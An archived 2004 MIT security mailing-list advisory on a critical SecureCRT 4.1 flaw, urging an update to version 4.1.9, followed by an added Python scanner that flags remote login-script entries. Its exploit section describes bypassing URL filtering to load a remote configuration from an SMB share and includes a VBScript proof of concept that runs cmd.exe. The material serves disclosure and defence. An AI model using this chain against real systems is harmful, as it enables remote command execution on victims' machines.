[261] in Security FYI
[Security-fyi]
daemon@ATHENA.MIT.EDU (Mark Van Dyke)
Thu Dec 2 13:00:56 2004
Message-Id: <F07A7E90-448A-11D9-925B-003065D63F3A@mit.edu>
From: Mark Van Dyke <mvan@mit.edu>
Date: Thu, 2 Dec 2004 12:52:31 -0500
To: security-fyi@mit.edu
cc: Software Release Team <swrt@mit.edu>
cc: itss@mit.edu
Greetings,
Please be aware of the following security threat concerning SecureCRT
V4.1 and earlier, and see below for further details:
=============================================================
Date: November 23, 2004
Advisory: NTBugtraq Advisory
Affected: SecureCRT V4.1, V4.0 (and probably lower)
Impact: All Windows platforms using SecureCRT -- Critical
Action to Take: Update to SecureCRT V4.1.9
=============================================================
You can download SecureCRT V4.1.9 from the MIT IS&T Windows Software
Site: https://web.mit.edu/software/win.html. Please note that you need
a current personal certificate to download this software. If you do not
have a current personal certificate, then you can obtain one from
https://ca.mit.edu/.
Notable Features of SecureCRT V4.1.9:
------------------------------
- Includes 4.1.9 binaries
- Adds path to VSH and VCP to PATH variable (for users who would like
to use the command line)
- First-time users (i.e. anyone but the account that installed
SecureCRT) will only see a quick, one-time repair that doesn't require
the installer to be on the user's system
- New "Create Athena Shortcut" item in the SecureCRT Program Files
folder will create (and ask to overwrite if it exists) a shortcut to
Athena. This is instead of creating a shortcut via repair. Only the
installing account will have this shortcut automatically.
- Running the "Create Athena Shortcut" item will allow the user to
create a GSSAPI (Kerberos Tickets) shortcut to Athena if they prefer
(click Options... button)
Known Issues:
-------------
There are no known issues for SecureCRT 4.1.9.
Getting Help:
-------------
If you have a question or need assistance, please contact the Computing
Help Desk at computing-help@mit.edu or x3-1101.
Further Details on the Exploit:
--------------
There appears to be some filtering around the use of \ in the
URL-to-command-line parsing that prevents the specification of an SMB
share to use for configuration. This can be easily bypassed and leads
to the loading of a configuration file from a remote site.
The configuration file contains an entry that specifies the login
script to run, which can be set to a file on the remote share:
S:"Script Filename"=\\ipofshare\share\folder\scriptname
And the login script can then contain scripting such as:
# $language = "VBScript"
# $interface = "1.0"
Sub Main
    dim wshShell, boolErr, strErrDesc
    Set wshShell = CreateObject("WScript.Shell")
    run = wshShell.Run ("cmd.exe /c dir >c:\shell.txt",0,True)
End Sub
Mark Van Dyke
IT Security Support
MIT Information Services & Technology
mvan@mit.edu
_______________________________________________
Security-fyi mailing list
Security-fyi@mit.edu
http://mailman.mit.edu/mailman/listinfo/security-fyi
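
A defensive check for the condition described under "Further Details on the Exploit", added here as an example and not part of the original advisory or of SecureCRT: it scans configuration files for "Script Filename" entries that point at a remote share rather than a local file. The .ini directory layout, the function names and the sample entries are assumptions.

```python
"""Flag SecureCRT-style config entries whose login script lives off-host."""
import re
import sys
from pathlib import Path

# String entries in the form the advisory shows: S:"Name"=value
ENTRY_RE = re.compile(r'^\s*S:"(?P<name>[^"]+)"=(?P<value>.*)$')


def is_remote_path(value):
    """True for UNC paths (either slash direction) and URL-style values."""
    raw = value.strip().strip('"')
    return raw.replace("/", "\\").startswith("\\\\") or "://" in raw


def find_remote_scripts(text):
    """Return [(line_no, value)] for remote "Script Filename" entries."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), 1):
        m = ENTRY_RE.match(line)
        if not m or m.group("name").lower() != "script filename":
            continue
        value = m.group("value").strip()
        if is_remote_path(value):
            hits.append((line_no, value))
    return hits


def audit_directory(config_dir):
    """Scan *.ini files under config_dir (assumed layout); {path: hits}."""
    findings = {}
    for path in sorted(Path(config_dir).rglob("*.ini")):
        hits = find_remote_scripts(path.read_text(errors="replace"))
        if hits:
            findings[str(path)] = hits
    return findings


# Constructed sample, not taken from a real configuration.
SAMPLE = "\n".join([
    r'S:"Hostname"=host.example',
    r'S:"Script Filename"=\\192.0.2.10\share\folder\login.vbs',
    r'S:"Script Filename"=C:\Scripts\login.vbs',
])

if __name__ == "__main__":
    if len(sys.argv) > 1:
        for path, hits in audit_directory(sys.argv[1]).items():
            for line_no, value in hits:
                print(f"{path}:{line_no}: remote login script {value}")
    else:
        print(find_remote_scripts(SAMPLE))
```

Run it with the configuration directory as the only argument; with no argument it checks the constructed sample.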